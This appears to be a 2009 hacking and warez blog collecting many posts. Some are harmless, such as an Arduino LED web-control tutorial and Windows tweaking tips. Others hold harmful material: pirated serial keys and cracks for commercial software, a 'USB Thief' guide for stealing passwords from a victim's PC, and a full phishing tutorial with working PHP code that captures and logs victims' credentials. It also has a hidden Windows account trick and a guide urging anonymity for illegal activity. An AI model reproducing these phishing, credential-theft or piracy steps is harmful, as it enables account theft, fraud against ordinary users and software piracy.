Monday, September 28, 2009

Blinking an LED over the web, with python firmata, php, and apache.

This was done on a mac, however it should be the same or very similar on a linux system as well. Either way you need a webserver with php running, and an arduino conneceted via ftdi(usb probably) to your computer. You will also need to install the python firmata module, which is pretty straight forward, and you can get that here: http://github.com/lupeke/python-firmata.


 

This is to show you how to make an led blink, using a web page you have coded, and an arduino. Why would I show you how to do something so insignificant? The idea, is that this would be a place to start, with any sort of, over the web arduino fun. There are a list of caveats at the end.


 

Open the arduino program, then select File->Examples->Firmata->Standard Firmata. Then upload this to your board. If you have problems uploading, be sure you have the right board and serial port selected under tools. My cpanel.php file looked like this:


 


 

Top of Form

On Light


 

Bottom of Form

$password = $_POST["password"];

$light_on = $_POST["light"];

if(isset($light_on)){

$execute_light = `/Users/dustycarver/python/led2.py`;

}

?>


 


 


 


 

$execute_light should equal the pathname to your python firmata file, and should be surrounded my backticks(`), not single quotes(').Your python file should look like this:


 

#! /usr/bin/env python

"""

Simple LED blinking example using Python Firmata

Copyright (C) 2008 laboratorio (info@laboratorio.us)


 

This program is free software: you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation, either version 3 of the License, or

(at your option) any later version.


 

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.


 

You should have received a copy of the GNU General Public License

along with this program. If not, see .

"""


 

from firmata import *


 

a = Arduino('/dev/tty.usbserial-FTE4W74Q')

a.pin_mode(13, firmata.OUTPUT)

a.delay(2)


 

a.digital_write(13, firmata.HIGH)

a.delay(2)

a.digital_write(13, firmata.LOW)

a.delay(2)


 


 

You can see I stole the code from the python firmata example, however I took out the loop so it would do only one sequence of blinks. Your "a =" line should have the address of your Arduino device.


 

Caveats:

Obviously this has limitations, it has to negotiate the connection with the arduino each time and that's a lot of overhead, so this is probably a good way to get started on something like turning your lights on at home before you get there, and less real time stuff. I am working on a mod_python deal, so that the connection is ever present and will submit that, if it ever becomes fruitful

Monday, September 21, 2009

Computer Optimization/Tweaking Programs!

Computer Optimization/Tweaking Programs!


Why do you need these programs?
There are numerous reasons why you need these.
All the time you're surfing the internet, your computer is becoming filled up with temporary files, cookies, and leftover traces.
All the time your computer is on, your disk & registry is becoming fragmented.
Your computer is being slowed down.
These programs are designed to dramatically improve the speed of your computer, optimize it visually, optimize system settings and fix errors.
Also see program descriptions below.




1) Auslogics Boostspeed

[Image: 30uphyc.png]

Auslogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized.

Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features.

BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC.


Rating - 10/10

Serials
Code:
Name: Team NOY Serial: 120D-D33D-C043-98B8-D869-65E3-7529-6CC1-CF80
Name: www.serials.ws Serial: 6407-F822-A162-B59F-36AE-93FE-0288-0882-09AA
3835-F87D-9413-E8AE-D58A-83CB-05D2-F201-4452
register name / ID: Team DVT
Code:
10E8-5391-DDFD-4BB9-FECE-83E2-4A46-ADE3-1CE2
register name / ID: Xevonarin




2) Advanced SystemCare V3 Pro

[Image: home.jpg]

Advanced SystemCare Pro provides an always-on, automated, all-in-one PC Healthcare Service with anti-spyware, privacy protection, performance tune-ups, and system cleaning capabilities. This powerful and award-winning precision tool fixes stubborn errors, cleans out clutter, optimizes Internet and download speeds, ensures personal security, and maintains maximum computer performance automatically.

Rating - 10/10

~Clean keygen included




3) Tune Up Utilities 2009

[Image: TuneUpUtilities2009screenshot.jpg]

TuneUp Utilities 2009: The complete Windows optimization package.Now including disk defragmenter and brand new cleaning tools! Increase performance: Boosts system performance by defragmenting hard drives; Noticeably speeds up Internet surfing and downloads. Solve problems: Analyses the file system and corrects errors; Checks drives for defects; Prevents data loss; Effortlessly solves common computer and display problems; Restores accidentally deleted files. Customize Windows: Offers more than 400 options to customize Windows; Optimizes Internet connection and browser; Allows to customize the Windows user interface. Free up disk space: Analyzes the storage medium̢۪s content within seconds; Identifies and deletes non-required files; Deactivates unused Windows functions. 1-Click Maintenance: Performs maintenance functions with a single click: When activated, runs in the background and keeps the system in perfect condition: Corrects registry errors and deletes temporary files: Ensures optimum system performance by defragmenting hard drives.

Rating - 9.5/10


Serials
Code:
Name: Anything
Organization: Anything
Serial:
BFD45E-630ATE-H1MA0C-0HWTRB-15KY5M-F0V291
BFD6YK-XW1Q1H-R1CQAR-3R0K42-AACXJ7-14WARD
BFE1H2-T00WJ1-EV1RQJ-AH73RC-731X3V-WW0BMV
BFF8V6-M9MC98-V2K17X-XHNMR8-CYJN00-QDPYNB
BFHTXJ-JHB14W-QYYRNN-BWA6JJ-XYQND7-0A4EQ9
AQKA2P-HY7FQF-8M0930-DW4H4V-1EJPRC-16CHPN




4) Comodo System Cleaner

[Image: comodo-system-cleaner-free-computer-cleaner-suite.jpg]

Comodo System Cleaner is the perfect cleaning and maintenance toolkit for those who like to have all the necessary system tools under a single, perfectly organized interface.
All the utilities included in Comodo System Cleaner are grouped into different tabs, according to their purpose: clean-up, tune-up, diagnostics, utilities and miscellaneous. This tabbed interface makes the program easier to use, though sometimes it forces you to browse through different levels until you find the exact tool you're looking for.
In Comodo System Cleaner you'll find a bit of everything from cleaning tools to junk erasing. You can wipe out computer usage traces or remove broken entries in the Windows Registry. The program has utilities that have been especially designed to hide folders, find duplicate files, encrypt documents, rename files, create a complete system report, do some benchmark testing to your computer, and analyze the way your hard drive space is distributed and much more.


Rating - 8/10

~Free, no activation needed.




5) WinBubble

[Image: winbubble-3-thumb.png]

In just two clicks, WinBubble will help you to customize and tweak your Windows Vista easily. Its features cover customization, security and optimization. Features: Windows customizations: add/edit OEM logo and information, edit owner information, context menu customizations, customize screensaver (bubbles, ribbon, and mystify), customize and remove the arrow on shortcut icons, desktop icons: show IE, computer, network, control panel, user name folder and public folder to desktop, hacking Windows experience score, re-enable hibernation, show Windows Vista build on desktop, enable slow-down animations, enable/disable Welcome Center.

Rating - 7/10

~Free, no activation needed.



6) Ashampoo WinOptimizer

[Image: 84b4757b3d945df6633c2363654ad65d.jpg]

Ashampoo's extensive pool of knowledge about Windows optimization is the basis for Ashampoo WinOptimizer. The program is designed to enable both novice and advanced users to cleanse and optimize their Windows system and adapt it to their own needs. Easy-to-use menus present the individual modules of Ashampoo WinOptimizer and make it possible to measure system performance, deactivate annoying autostart entries, or delete unnecessary files, all with a mouse click.

Rating - 7.5/10

Serials
Code:
Name: www.serials.ws
Serial:
AWPSFI-77SE3D-DBSE0L
AWPSFT-77ACA6-C4R8DB
AWPSFP-77EPE4-IDEFFK
AWPSFO-77ZBA1-O2781B



7) EnhanceMyVista

[Image: details_enhancemyvista-pro-2.5.1-1.png]

EnhanceMyVista is an easy to use yet advanced enhancing, optimizing and tweaking tool for Windows Vista.
With a clean and simple interface it brings you an All-in-One set of powerful and neatly classified tools, settings and tweaks.
As a bonus there are some unique and uncommon options too. Being permanetly in development it is the best choice in it's category.



Rating - 8/10

~Free, no activation needed.



8) EnhanceMySe7en

[Image: EnhanceMySe7en.png]

EnhanceMySe7en helps users to control many aspects of the system with maximum convenience.
You will get everything needed for maintaining Windows 7 in a perfect condition. The program offers tools that take care of the registry, disk space and its defragmentation, installed software, HDD temperature and all sorts of things related to system's health. Also there are lots of other options helping to boost your system's performance.
With a clean and simple interface it brings you an All-in-One set of powerful and neatly classified tools, settings and tweaks.


Rating - 9/10

~Free, no activation needed.




9) nCleaner

[Image: details_ncleaner-2.3.4.jpg]

nCleaner is a system cleaner that allows you to clean both your system and applications, free more disk space, boost your system's speed and get more stability and privacy protection.
nCleaner contains an advanced system and application cleaner with over 90 cleaning items available, a Registry Cleaner, a Tweak Manager, an advanced Startup Manager, a Junk Finder, a Free Space Shredder, a System Resource Monitor, a System Adviser, supports logging and statistics as well as advanced Scheduling.
Remove unnecessary files like log files and left behind files and registry entries, scan the registry and remove invalid entries to increase performance and stability, and apply performance and privacy related tweaks to your Windows system.
nCleaner also offers memory management, advanced schedule options and real time system resources monitoring.


Rating - 8.5/10

~Free, no activation needed.



10) Tweak Genie

[Image: details_tweak-genie-6.0.0.gif]

Tweak Genie will assist you to manipulate the hidden settings of windows according to your requirements. It gives you full control over these settings. These settings cover various aspects of your windows operating system like Appearance, Security etc. Tweak Genie provides you lot of options to personalize you windows operating system. It has a very user friendly graphical interface which makes it very easy to use.


Rating - 6.5/10

~Free, no activation needed.



11) DTweak Pro
[Image: DTweak.jpg]

Tweak a myriad of Windows Vista features and enhance its performance. With DTweak you can defragment disks and registers, clean registry system, tune computer performance, optimize and increase the speed of your Windows Vista system without manually modifying registers or INI files.

Rating - 7.5/10

Shutdown Computer with a Cell Phone

NOTE: This tutorial is NOT written by me.

Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone.

To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown.


So, this is how you do this:

1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves or can download them from here.

2. Extract them to your C:\ drive so the path to the shutdown batch file is C:\sms_functions\shutdown.bat (Important this is a must the path must be exact) or you can modify the rule once you import it to point to the new destination, it's your call.

3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.

4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.

5. Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.

6. Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.

7. Now select the shutdown.rwz file that was found in the zip file named sms_functions that you downloaded.

8. Now, when you send a message from your phone to your e-mail address with the subject smsshutdown%%, your computer will shutdown.

You can also make your own rule, so that you can use your own batch file, and may specify the phrase you want to trigger the action.

Ultimate PC Security Guide

Being a hacker, you're coming face to face with some of the most malicious programs on the internet every day. You want to be secure. Most of the programs you'll be downloading will be malicious, so how can you tell if the program will be working against you or for you?
This guide will be looking at the scanning of malicious files, as well as a guide to anti-viruses & firewalls and a brief introduction to sandboxing and anonymity. So yep, you're in for quite a bit of reading. Grab a drink, maybe a cigarette.

Being secure is important. Just because you call yourself a hacker, it doesn't mean you're immune to attacks towards your computer. Without my anti-virus, I doubt I'd actually be typing this now - I'd probably be searching through my registries and screaming like a chicken on speed. I'm like that.
Not all anti-viruses work the same way. Some anti-virus programs are bad; some are good, and some are just plain useless. We'll be looking at which ones are the best of the best, and which ones are just plain fail.
Being infected with something can also put your friends and family at risk, other users of your computer could be having their login & credit card details stolen without any knowledge of it. Worms can also spread to your email contacts and friends on popular websites such as Facebook.


Downloads & Scanning
For example, you download a program and the poster is claiming that it is a clean botnet controller. If we can this, it will come up with results such as "Win32/RBot" etc.. This means that the file should be what we wanted.
Now, if the botnet-controller scan came up as something like "Win32/trojan.agent.a", we can tell that this is a malicious program that will work against us. This is an example of a download you do not want to use.
All in all, the scan should show results similar to what you were downloading.
You should always be careful what you download. You may often be downloading malicious software without even realizing sometimes. Trust me, this happens to a lot more people than you think.
If you're expecting a file to be much bigger than the download you find, don't touch it. An example of this would be "Windows XP Theme - 350kb!" when it should be a lot higher, such as 30-50mb.
Remember to always check the names of the files you download.. If you're downloading a cracked program, it would be unusual for it to have no credits or advertisements in it. I would trust " 'x' cracked by 'y' " more than I'd trust " 'x' crack". Credits, names or advertisements should nearly always be in .rar or .zip files, this is one good way of recognizing a trusted download.
Here is a quote from Wikipedia which you may find helpful: "Example: ZTreeWin_1.5.zip contains a crack to register ZtreeWin 1.51 included files are: keygen.exe, one.nfo, file_id.diz and 'RUN.EXE'. It is the 'RUN.EXE' that contains the rogue program"
Downloading really isn't necessary and is often risky, but we have some clean content in the HF-L33t section if you want to upgrade for that. Wink

Online File Scanners
Web-scanners such as "VirusTotal" and "NoVirusThanks" are becoming increasingly popular with the amount of anonymous downloads posted all over the internet.
If you want to scan a file you find suspicious, you can go to either http://virustotal.com or http://novirusthanks.org to do so.
VirusTotal will send samples of the file to the antivirus companies, so this is not recommended if you want to keep your file undetectable.
NoVirusThanks has an "Advanced options" area where you can choose to not distribute your file to the antivirus companies, this is handy for keeping things fully undetectable, but if it's a file you don't trust and don't want yourself or others to be infected by it in the future, I suggest you allow them to distribute it to the antivirus companies. I respect what these websites and the malware fighting websites do, and so should you.

Visiting Websites & Reading Emails.
Be cautious of the websites you visit. I wouldn't recommend visiting any websites that seem cheap, uncommon, or freely hosted. Malicious websites are often misleading or can just inject things into your system without your consent. If you use the "Chrome" browser from Google, you may have noticed that it automatically downloads files without prompting you. Chrome is a browser I would not recommend just because it is so new, all new things have vulnerabilities, and if a vulnerability can be exploited, it will be exploited.
I'm behind a firewall and anti-virus anyway, but the only websites I visit are popular ones. The untrustworthy and uncommon websites usually don't appeal to me, for obvious reasons..
When opening emails, you should also be cautious. Just because it's an email from your friend - it doesn't mean you can trust it! You may see some emails asking you to update your bank details -- your banks should never ask you to do that via email. The details you enter will be sent out to someone who is going to exploit your details, so steer away from these emails.
Worms can be spread via email. For example, you open an email from Bob containing a worm, this worm is then sent to all of your contacts. This is how most worms will work, and it is suggested that you change your emailing service if it could be vulnerable. You can use Microsoft's live hotmail service which is excellent, it will also disable any harmful content from downloading onto your computer. You can find this service at http://mail.live.com

Sandboxing
By using a sandbox, everything that is downloaded onto your computer will remain in the sandbox. It will not escape, meaning that malicious downloads cannot harm your computer. Sandboxing is a great way to test whether or not a website can be trusted. I rarely do this, but it's so useful sometimes.
Sandboxing will also protect your cookies, history and cached temporary files from being leaked. Downloads are isolated, meaning that they are trapped and your computer is protected.
Here is a download I posted for Sandboxie v3.30: http://www.hackforums.net/showthread.php?tid=30371

Firewalls
The good antiviruses will have a built-in Firewall, but if not, then it may be worth downloading one. Firewalls aren't essential, but can help a lot.
Some firewalls have IP masking options, but these can usually slow down your computer and are not worth using unless you're doing something illegal.
The main use of a firewall is to prevent incoming traffic, which will stop things like 'telnet' from reaching your connection, and can also stop worms etc. from accessing your network. Firewalls will also block the backdoors that trojans create, so if you find yourself unlucky enough to have a RAT (Remote Access Trojan) on your computer, the backdoor should be blocked by your firewall, but it is possible for a trojan to bypass this. Having a firewall does not mean you are secure, many firewalls can be easily disabled or bypassed by malware. Some firewalls will also block legit connections, such as downloads for software. Do not think you're secure just because you have a firewall, this is a common misconception with firewalls. Too many people think that by installing a highly popular firewall, they'll instantly be secure against the latest intrusions, but this is not at all true.
Firewalls may also make an effect on your connection speed. If you have a very fast download speed, you may notice a difference when you get a firewall, but the download speed may remain normal on users with slower speeds. This effect can vary between users, and depends on the connection. It's best to try several firewalls to find out which one suits you best - reviews are personal and will not always be the same for everyone.
One of the favourite firewalls is "ZoneAlarm" which is very popular and has a free version. The paid version is obviously better, but it isn't necessary at all.
If you're using Windows Vista, I'd recommend choosing ZoneAlarm as your firewall. The same goes for XP, but you might want to get your hands on a "BlackIce" crack instead, if possible.
Another great Firewall is "Comodo" which is also free can be found here...
Comodo: http://www.personalfirewall.comodo.com/
Zone Alarm: http://www.zonealarm.com/store/content/c...wall_b.jsp
Ghost: http://www.ghostsecurity.com/ghostwall/

Antiviruses
An anti-virus program is essential. You honestly shouldn't go without one. If you don't have one, there is a list of downloads and recommendations in the next post. Don't be worried about the anti-virus slowing down your computer, if you get the right one then your computer will remain at maximum performance.
You want an antivirus that will scan your RAM and system folders constantly, because then you will be alerted if something harmful has been found in them. The average antivirus will only scan and remove when told to, but the best ones will scan constantly, update daily, and give plenty of tweaking options to fit to your preferences.
If there are malicious programs that you want to download such as Metasploit, it is best if you have an antivirus that will allow you to do so. Some antivirus programs will give you no option and will quarantine the file straight away, but others such as Kaspersky will give you the option to clean, remove or ignore.
Viruses can sometimes fully disable your protection, but the stronger programs such as Nod32 can withstand this and will be unclosable. You want something tough if you're going to be downloading riskware.
A good anti-virus will also constantly scan your downloads and running processes. Hopefully you are able to understand now why these are essential.
If you want to run more than one antivirus, you must find a combination that works. If you have a good antivirus, you won't need to. Infact, you shouldn't ever need to run more than one. I remember having Kaspersky running while I installed Nod32, my PC growled. :3 The only antivirus-related programs I have installed at the moment are HijackThis, ComboFix and NOD32. I like to use HijackThis to see what's running on my computer, and I always keep ComboFix just incase, you never know what's round the corner...
I remember having no antivirus software installed whatsoever, and then I received a rootkit that wouldn't let me download any software.. I got rid of them eventually, but it wasn't easy, the rootkit wasn't detected by most AV's because of it being so new/rare - you still can't find it on a few of the AV databases! But I do wish I had it again, so I could send it out as a sample.
I will be listing my favourite anti-viruses in my next post. I strongly recommend you stick to these, as there are many fake ones that you can be easily lead to. Remember to look things up before downloading them. Pick wisely! :3


The Top 5 Anti-virus Programs.
Here's the list of my top five favourite anti-virus programs in order.
You can pick which you want from each picture, but I'd recommend Kaspersky.

Kaspersky:

http://rapidshare.com/files/281661002/kaspersky-18-9-09.zip

and serial.

Nod32:

http://www.eset.com/

Logins: http://www.nod325.com/

Avast:

http://www.avast.com/eng/download-avast-home.html

Bitdefender:

http://www.bitdefender.com/site/Downloads/

Essential Additions.
There's a few more tools which I'm sure you'll definetely want to get.
HijackThis is a tool used to scan the areas of your computer which viruses are often located in. It will also scan the registry areas which hold the legitimate programs and, quite often, the infections. It is best not to delete ('fix checked') any entries on HijackThis unless you know what you're doing, as you may be removing something which is a required part of your system.
Another good thing about HijackThis is the fact that it's so lightweight, it uses barely any memory, it's easy to use, and you don't need to keep it running!
This is a great area to check if a process is harmful or not: http://www.bleepingcomputer.com/startups/
HijackThis can be found here: http://free.antivirus.com/hijackthis/

Browser Protection
There are several great addons for browsers which you can get to protect you from malicious websites.
If you use FireFox, look for "WOT" and "NoScript", WOT will give warnings before you visit a website, and NoScript will disable malicious scripts from running when you visit a website.
If you use Internet Explorer, look for "IE-Spyad", IE-Spyad will redirect you away from malicious webpages and guard you from over 5,000 different URL's.
I'm also working on my own plugin, which you can expect to see in a few months. This will be for IE only, until I fully figure out how FireFox operates.

Okay, now that you're protected (well, I hope you are), it's time to be invisible...

IP Hiders
You can get some great IP hiders to keep you anonymous.
A personal favourite is "Hide-The-IP", which allows you to select the proxy and choose the speed of the one you want.
Hide-The-IP can be found here: http://www.hide-the-ip.com/ - Though you may need to find a crack for it!
There are many fabulous IP hiders out there which can be found, and these are a must if you're going to be involved in any illegal activity.

Tor: Anonymity Online
You may want to download "Tor" and TorButton for FireFox. This is a program which will select a proxy for you and allow you to spoof your connection by using that.
TorButton is a FireFox addon which allows you to change your proxy quickly by clicking the button. This is a great tool, and another good reason to download FireFox!
The whole Tor website with information & downloads can be found here: http://www.torproject.org/


Alright, grab another cup o' coffee, 'cause we've still got more to do..

Personal Details
Okay, you may want to give out your name and things on your Facebook or MySpace, but if you do, it's wise to use an alternate alias. If someone searched your hacking alias in Google, they'd probably be able to pick up a lot of information on you from that. Think about the name you choose before you choose it, and make sure you don't over-use it - only use it where you think you should. Don't complain about not being anonymous if you're going to splurt out your details everywhere, you can't expect to stay hidden if you're going to give yourself away without realising. Remember that.

Keeping Software Updated
Software should always be kept updated. This is vital. Most security experts will tell you that updating your software is more important than having an antivirus, because malware finds flaws and vulnerabilities in software that it can exploit.
This is what should always be kept fully up to date:
Your operating system (e.g. updating from Windows XP SP1 to SP2).
Java.
Browser.
Antivirus.
Firewall.
Instant messaging or email applications.
Any other software which could be exploited.
Zer0man showed me this lovely website with scanners you can use to check for out-of-date software...
Here's the online version: http://secunia.com/vulnerability_scanning/online/
And the downloadable version: http://secunia.com/vulnerability_scanning/personal/
Quite obviously, the downloadable version scans for more vulnerabilities than the online version, and it includes more features. This is a great tool to use every few weeks, since you never know what's around the corner ;-)

Active Thinking
Many scams and computer infections require your consent, so you should always be wary. If something doesn't quite look right, make sure to research it. Many people are fooled into giving away their details by fake emails from companies such as banks, social networking websites, etc. You shouldn't believe everything you read. Many scams will lead you on, so you just have to watch out. Keep everything you've learned from this guide in mind, and you'll be safe.
A good quote from The Real Hustle: "If it looks too good to be true, then it probably is".

Passwords
Though it is also important to have a password you will remember, you should also be sure that it can't be guessed. If it's a site containing personal information, I suggest you change your password once a month. A good password would contain letters, numbers and symbols - maybe even words in a foreign language if it helps! An example of a good password would be "A$fao4iz3£p" not "John1982" or "ilovefootball". Passwords should be different for each website you use, because if someone hacked into a forum, for example, and took your details - potentially, they could have access to your payjerks account, Facebook, etc.

Well, you should know just about everything you need to know by now. If there's anything else you're wondering, don't hesitate to ask! I will be here for any questions, feedback or suggestions. This guide should keep you well-hidden and protected from now on, just remember to keep everything in mind!

USB THIEF. Steals Pc Passwords (TUT)

[Image: 307tb1f.jpg]

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:

1.Decompress the archive and put all the files located in the folder "USBThief"into a USB.
2.Insert the USB in your victim's computer.
3.View folder "dump" to see the passwords.


Added Video Cache View (Let's see what porn vids ppl been watching )
Added My Last Search
Added MSN pass stealer (only works if they have auto sign in on)
Added Mozilla Cache View
Added IE Cache View
Added Protected Storage PassView



Tutorial on phishing!

Hi all! heres my first tutorial and its gonna be on Phishing!

allright lets get started!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this

or anything alike and probably more inside like "id=" and "autocomplete=".

4. change the url (in this case "RANDOM URL") to "write.php"

5. If the method is "post" then change it to "get"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called "write.php" and copy / paste this:

header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.

11. Save this file (write.php), and upload it to the subdomain aswell

13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt


Happy phishing

Sunday, September 13, 2009

Rapidshare Bypass all limits(100% working)

I am sure you would have downloaded many programs that promise to allow you to bypass Rapidshare limits but this a program that is not fake but working 100%.It supports:
Download Resume
Multiple downloads
Immediate download start(No need to enter codes)
No download limits
Boosts download speed
No waiting whatsoever
This is what you always dreamt of!
Note: Download and unrar the package and run the installer.
Uncheck the start now option
Copy the crack to the installed folder and run the program.
Enjoy!
Download like pro
*might be slow if using with a dialup connection
http://www.megaupload.com/?d=9ITOY6ZK

Disable Windows From Restarting After Automatic Updates

windows_update_restart

I always advised my readers to activate Automatic updates in Windows as it will allow you to keep your PC safe and secure with the latest patches Windows releases. However one of the most annoying things about Windows Update is that it automatically restarts the PC after a certain time. It does provide you with an option to delay the reboot, but if you are not near the PC it will force restart and you may lose unsaved data and open applications.
In order to stop Windows Update from automatically restarting/rebooting your PC, follow the simple steps given below.
Note: You will have administrative privileges to perform the actions below. Also the steps below will only temporarily disable the automatic restart, it may still show you the restart dialog though.

How to Stop Windows Update from Automatically Restarting PC

Step 1: Press Windows + R key and type in cmd. Press enter and a new command prompt will open up.
Step 2: In the command window, just type in net stop “windows update” with the quotes. This should stop Windows from automatically restarting.
Additionally if you do not want to follow the steps above, you can also download a software called Leave me Alone which will allow you to disable automatic reboots without changing any additional settings.

Monday, September 7, 2009

Making a hidden account in xp

Hi guys i m going to tell u how to make a hidden account in xp.

Step1
first create a new user account in xp,through user accounts.

Step2
go to RUN type regedit open key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" .

Step3
In the right side u can see list just right click in empty area and select a new DWORD
value. and rename it to your user account's name(user name).


Step4
just close registry press F5(refresh) and go to your user account what u see.......
wow! your account is not displayed in user account.


step5
Now u can't see your account in logon screen so how to access it , just press ctrl+alt+del twice a new window opens enter your username and password(if not set leave it blank).

Send fax from PC

Venta Fax & Voice v6.1.59.144 Business International
Send and receive black-and-white or color faxes, and turns your PC's fax modem into a versatile answering machine with remote control. Retrieve your fax and voice messages from any touchtone phone, plus have your e-mail messages and faxes forwarded to you as e-mail attachments. VentaFax also supports Caller ID (if available) and allows you to record a telephone conversation with a single click.





Download Link: Depositfiles
Click to Download from DepositFiles

Download Link:
Click to Download it from HotFile